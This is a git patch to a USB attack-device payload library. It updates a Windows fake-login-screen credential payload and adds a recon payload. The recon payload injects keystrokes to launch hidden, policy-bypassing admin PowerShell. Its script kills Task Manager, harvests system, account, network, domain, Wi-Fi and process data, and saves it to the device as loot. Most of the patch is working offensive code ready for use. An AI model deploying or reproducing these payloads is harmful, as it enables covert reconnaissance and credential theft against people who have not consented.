From 8cd8d859cd92f1fd13094265cef2a978e5b47cc6 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Fri, 30 Apr 2021 17:02:21 +0100 Subject: [PATCH] New Payload: Win_PoSH_WordReport, Fix typos in Win_PoSH_FakeLoginScreen (#431) * Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny * Morse Code File Exfiltration A bit pointless with limitation of morse code but I thought it was fun to create. * Update readme.md * Update for non-alphanumeric * Update for timing * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update payload.txt * New payload - Fake Login Shows a fake version of the windows 10 login screen * Update readme.md * Changes to Fake Login Payload * Changes to Fake Login * Win_PoSH_FakeLogin: Changes to payload and readme * New recon payload: Win_PoSH_WordReport * Update fixed typo: Win_PoSH_WordReport --- .../Win_PoSH_FakeLogin/payload.txt | 42 +-- .../credentials/Win_PoSH_FakeLogin/readme.md | 2 +- .../recon/Win_PoSH_WordReport/Recon.ps1 | 300 ++++++++++++++++++ .../recon/Win_PoSH_WordReport/payload.txt | 35 ++ .../recon/Win_PoSH_WordReport/readme.md | 29 ++ 5 files changed, 387 insertions(+), 21 deletions(-) create mode 100644 payloads/library/recon/Win_PoSH_WordReport/Recon.ps1 create mode 100644 payloads/library/recon/Win_PoSH_WordReport/payload.txt create mode 100644 payloads/library/recon/Win_PoSH_WordReport/readme.md diff --git a/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt b/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt index 7874f79c..1b921a82 100644 --- a/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt +++ b/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt @@ -1,20 +1,22 @@ -# Title: Fake Login -# Description: Shows a fake login screen -# Author: Cribbit -# Version: 1.0 -# Category: Credentials -# Target: Windows (Powershell 5.1+) -# Attackmodes: HID & STORAGE -# Extensions: Run - -LED SETUP - -GET SWITCH_POSITION - -ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E - -LED ATTACK - -RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')" - -LED FINISH +# Title: Fake Login +# Description: Shows a fake login screen +# Author: Cribbit +# Version: 1.0 +# Category: Credentials +# Target: Windows (Powershell 5.1+) +# Attackmodes: HID & STORAGE +# Extensions: Run + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE + +QUACK DELAY 500 + +LED ATTACK + +RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')" + +LED FINISH diff --git a/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md b/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md index ae174642..d5aedff1 100644 --- a/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md +++ b/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md @@ -21,7 +21,7 @@ If you do not wish to use them you could have the files on the bunny and do some ```powershell $BGImg = [System.Drawing.Image]::FromFile("bg.jpg"); ``` -or if you have web hosting or a http server runing on the bunny then you can do something like: +or if you have web hosting or a http server running on the bunny then you can do something like: ```powershell $R = Invoke-WebRequest 'https:///bg.jpg'; $BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream); diff --git a/payloads/library/recon/Win_PoSH_WordReport/Recon.ps1 b/payloads/library/recon/Win_PoSH_WordReport/Recon.ps1 new file mode 100644 index 00000000..bdce764d --- /dev/null +++ b/payloads/library/recon/Win_PoSH_WordReport/Recon.ps1 @@ -0,0 +1,300 @@ +Function New-WordTable { + [cmdletbinding( + DefaultParameterSetName='Table' + )] + Param ( + [parameter()] + [object]$WordObject, + [parameter()] + [object]$Object, + [parameter()] + [int]$Columns, + [parameter()] + [int]$Rows, + [parameter(ParameterSetName='Table')] + [switch]$AsTable, + [parameter(ParameterSetName='List')] + [switch]$AsList, + [parameter()] + [string]$TableStyle, + [parameter()] + [Microsoft.Office.Interop.Word.WdDefaultTableBehavior]$TableBehavior = 'wdWord9TableBehavior', + [parameter()] + [Microsoft.Office.Interop.Word.WdAutoFitBehavior]$AutoFitBehavior = 'wdAutoFitContent' + ) + #Specifying 0 index ensures we get accurate data from a single object + $Properties = $Object[0].psobject.properties.name + $Range = @($WordObject.Paragraphs)[-1].Range + $Table = $WordObject.Tables.add( + $WordObject.Range,$Rows,$Columns,$TableBehavior, $AutoFitBehavior) + + Switch ($PSCmdlet.ParameterSetName) { + 'Table' { + If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) { + #$Table.Style = "Medium Shading 1 - Accent 1" + $Table.Style = "Grid Table 4 - Accent 1" + } + $c = 1 + $r = 1 + #Build header + $Properties | ForEach { + Write-Verbose "Adding $($_)" + $Table.cell(($r),($c)).range.Bold=1 + $Table.cell($r,$c).range.text = $_ + $c++ + } + $c = 1 + #Add Data + For ($i=0; $i -lt (($Object | Measure-Object).Count); $i++) { + $Properties | ForEach { + $Table.cell(($i+2),$c).range.Bold=0 + $Table.cell(($i+2),$c).range.text = [string]$Object[$i].$_ + $c++ + } + $c = 1 + } + } + 'List' { + If (-NOT $PSBoundParameters.ContainsKey('TableStyle')) { + $Table.Style = "Light Shading - Accent 1" + } + $c = 1 + $r = 1 + $Properties | ForEach { + $Table.cell($r,$c).range.Bold=1 + $Table.cell($r,$c).range.text = $_ + $c++ + $Table.cell($r,$c).range.Bold=0 + $Table.cell($r,$c).range.text = $Object.$_ + $c-- + $r++ + } + } + } +} +Function val2addr($val){ + $addr=""; + foreach($i in $val){ + $addr += "{0:x2} " -f $i + } + $addr.Trim().Replace(' ', ':'); +} +Stop-Process -Name "Taskmgr" +$Word = New-Object -ComObject Word.Application +#$Word.Visible = $True +$Document = $Word.Documents.Add() +$Selection = $Word.Selection +$Selection.Style = 'Title' +$Selection.TypeText("PC Info Report") +$Selection.TypeParagraph() +$Selection.Style = 'Heading 1' +$Selection.TypeText("Details") + +$Selection.TypeParagraph() +$selection.TypeText("Hostname: $($env:COMPUTERNAME)") +$Selection.TypeParagraph() +$selection.TypeText("User: $($env:USERNAME)") +$selection.TypeParagraph() +$selection.TypeText("Date: $(Get-Date -Format "dddd dd MMMM yyyy hh:mm:ss")") +$selection.TypeParagraph() + +#OS Info +$OS = @(Get-CimInstance -ClassName Win32_OperatingSystem | ForEach { + [pscustomobject] @{ + Name = $_.Caption + Version = $_.Version + BuildNumber = $_.BuildNumber + Architecture = $_.OSArchitecture + SerialNumber = $_.SerialNumber + } +}) +$Selection.Style = 'Heading 2' +$Selection.TypeText("OS") +New-WordTable -WordObject $Selection -Object $OS -Columns 2 -Rows 5 -AsList +$Word.Selection.Start= $Document.Content.End + +#BIOS Info +$BIOS = @(Get-WmiObject Win32_Bios | ForEach { + [pscustomobject] @{ + Manufacturer = $_.Manufacturer + Name = $_.Name + Version = $_.Version + SerialNumber = $_.SerialNumber + BIOSVersion = $_.SMBIOSBIOSVersion + } +}) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("BIOS") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $BIOS -Columns 2 -Rows ($BIOS.PSObject.Properties | Measure-Object).Count -AsList +$Word.Selection.Start= $Document.Content.End + +#HDD Info +$DriveType = @{ + 0x0 = 'Unknown' + 0x1 = 'No Root Directory' + 0x2 = 'Removable Disk' + 0x3 = 'Local Disk' + 0x4 = 'Network Drive' + 0x5 = 'Compact Disk' + 0x6 = 'RAM Disk' +} +$Volume = @(Get-WmiObject Win32_Volume | Sort-Object -Property Name | ForEach { + [pscustomobject]@{ + Drive = $_.Name + DriveType = $DriveType[[int]$_.DriveType] + Label = $_.label + FileSystem = $_.FileSystem + 'FreeSpace(GB)' = '{0:N2}' -f ($_.FreeSpace /1GB) + 'Capacity(GB)' = '{0:N2}' -f ($_.Capacity/1GB) + } +}) + +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Drives") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $Volume -Columns 6 -Rows ($Volume.Count+1) –AsTable +$Word.Selection.Start= $Document.Content.End + +$SU = (Get-CimInstance -ClassName Win32_StartupCommand | Select-Object -Property Name, User, Command, Location) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Start Up") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $SU -Columns 4 -Rows ($SU.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + +$UA =Get-WmiObject -Class Win32_UserAccount | Select-Object Caption, Domain, Name, FullName, SID +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("User Accounts") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $UA -Columns 5 -Rows ($UA.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + +$Selection.Style = 'Heading 1' +$Selection.TypeText("Networking") + +$NAC = (Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object -Property Description, MACAddress, IPAddress, DefaultIPGateway) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Network Adapters") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $NAC -Columns 4 -Rows ($NAC.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + + +$NW = (Get-NetNeighbor | Where-Object State -NE Unreachable | Select-Object -Property InterfaceAlias,IPAddress, LinkLayerAddress, State, Store) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Network") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $NW -Columns 5 -Rows ($NW.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + +# Arp Info +$ARP = (arp -a | ConvertFrom-String -PropertyNames ('Type', 'Internet', 'Address', 'Physical')) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("ARP") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $ARP -Columns 4 -Rows ($ARP.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + + +$process = Get-Process | Select-Object -Property Id, Name, Company, ProductVersion, Path + +# Get Listeners / ActiveTcpConnections +$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess +$listener = $listener | foreach-object { + $listenerItem = $_ + $processItem = ($process | where { [int]$_.Id -like [int]$listenerItem.OwningProcess }) + new-object PSObject -property @{ + "LocalAddress" = $listenerItem.LocalAddress + "RemoteAddress" = $listenerItem.RemoteAddress + "State" = $listenerItem.State + "AppliedSetting" = $listenerItem.AppliedSetting + "OwningProcess" = $listenerItem.OwningProcess + "ProcessName" = $processItem.Name + } +} | select-Object LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress + +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Listeners / ActiveTcpConnections") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $listener -Columns 6 -Rows ($listener.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + +$ND = (Get-CimInstance -ClassName Win32_NTDomain | Select-Object -Property ClientSiteName, DcSiteName, Description, DnsForestName, DomainControllerAddress, DomainControllerName, DomainName, Roles, Status) +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("NT Domain") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $ND -Columns 2 -Rows ($ND.PSObject.Properties | Measure-Object).Count -AsList +$Word.Selection.Start= $Document.Content.End + +$location = $PWD +cd 'hklm:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged' +$Mac = gci | % { $name=$_.GetValue('Description'); $mac=val2addr($_.GetValue('DefaultGatewayMac')); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;MAC_ADDRESS=$mac }} +cd $location +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("Reg Access Points") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $Mac -Columns 2 -Rows ($Mac.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + + +$Selection.Style = 'Heading 1' +$Selection.TypeText("Software") +$Selection.TypeParagraph() + +$Selection.Style = 'Heading 2' +$Selection.TypeText("Current running process") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $process -Columns 5 -Rows ($process.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End + +<#$PE = Get-WmiObject -Namespace root\cimv2 -Class CIM_ProcessExecutable | %{try{[wmi]($_.Antecedent)}catch {$null}} | Select FileName,Extension,Manufacturer,Version -ErrorAction SilentlyContinue +$Selection.TypeParagraph() +$Selection.Style = 'Heading 2' +$Selection.TypeText("CIM Process Executables") +$Selection.TypeParagraph() +New-WordTable -WordObject $Selection -Object $PE -Columns 4 -Rows ($PE.Count+1) -AsTable +$Word.Selection.Start= $Document.Content.End#> + + +$Selection.Style = 'Heading 1' +$Selection.TypeText("Environment Variables") +$Selection.TypeParagraph() +$envPath = $env:Path -split ";" | %{"{0}`n" -f $_} +$Selection.Style = 'Normal' +$Selection.TypeText("Path:") +$Selection.TypeParagraph() +$Selection.TypeText($envPath) +$Selection.TypeParagraph() + +$Report = ((gwmi win32_volume -f 'label=''BashBunny''').Name + "loot\Report_$env:COMPUTERNAME.docx"); +$Document.SaveAs([ref]$Report,[ref]$SaveFormat::wdFormatDocument) +$Word.Quit() +$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$Word) + +$o = New-Object -com wscript.shell; +$o.SendKeys('{SCROLLLOCK}'); +sleep 1; +$o.SendKeys('{SCROLLLOCK}'); +sleep 1; +$o.SendKeys('{SCROLLLOCK}'); +sleep 1; +$o.SendKeys('{SCROLLLOCK}'); + +$null = [System.Runtime.InteropServices.Marshal]::ReleaseComObject([System.__ComObject]$o) +[gc]::Collect() +[gc]::WaitForPendingFinalizers() + +Remove-Variable -Name Word, OS, BIOS, DriveType, Volume, SU, +UA,NAC,NW,ARP, process, listener,listenerItem, processItem, +ND, envPath, PE, Mac, location, o -ErrorAction SilentlyContinue -Force \ No newline at end of file diff --git a/payloads/library/recon/Win_PoSH_WordReport/payload.txt b/payloads/library/recon/Win_PoSH_WordReport/payload.txt new file mode 100644 index 00000000..4f581884 --- /dev/null +++ b/payloads/library/recon/Win_PoSH_WordReport/payload.txt @@ -0,0 +1,35 @@ +# Title: Word Report +# Description: This payload in similar to the InfoGrabber payload. But save slightly different info to a MS Word document. +# Author: Cribbit +# Version: 1.0 +# Category: Recon +# Target: Windows (Powershell 5.1+) +# Attackmodes: HID & STORAGE + +LED SETUP + +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED ATTACK + +Q DELAY 200 +# Opens Task Manager +Q CTRL-SHIFT ESC +Q DELAY 100 +# Selects "&File" +Q ALT f +# Selects "Run &new task" +Q STRING n +Q DELAY 100 +Q STRING "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Recon.ps1')" +# Set Create this task with administrative privileges +Q DELAY 100 +Q TAB +Q DELAY 100 +Q SPACE +Q DELAY 100 +# Run +Q ENTER + +LED FINISH diff --git a/payloads/library/recon/Win_PoSH_WordReport/readme.md b/payloads/library/recon/Win_PoSH_WordReport/readme.md new file mode 100644 index 00000000..fe117f00 --- /dev/null +++ b/payloads/library/recon/Win_PoSH_WordReport/readme.md @@ -0,0 +1,29 @@ +# Word Report +- Author: Cribbit +- Version: 1.0 +- Target: Windows (Powershell 5.1+) +- Category: Recon +- Attackmode: HID & Storage +- Extensions: Run +- Props: Don Murdoch, Boe Prox, Simen Kjeserud, DannyK999 & T.J. Connor + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +This payload in similar to the [InfoGrabber](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber) payload. But save the info to a MS Word document and collects some different data. + +This payload needs an admin powershell prompt to run + +## Configuration +This payload is written for an English version of windows. You will need to update the letters used when accessing the menu with ALT for other languages + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| INJECTED | Green blink followed by SOLID | Injection finished | +| FINISHED | Blinks the scroll lock twice | Script is finished | \ No newline at end of file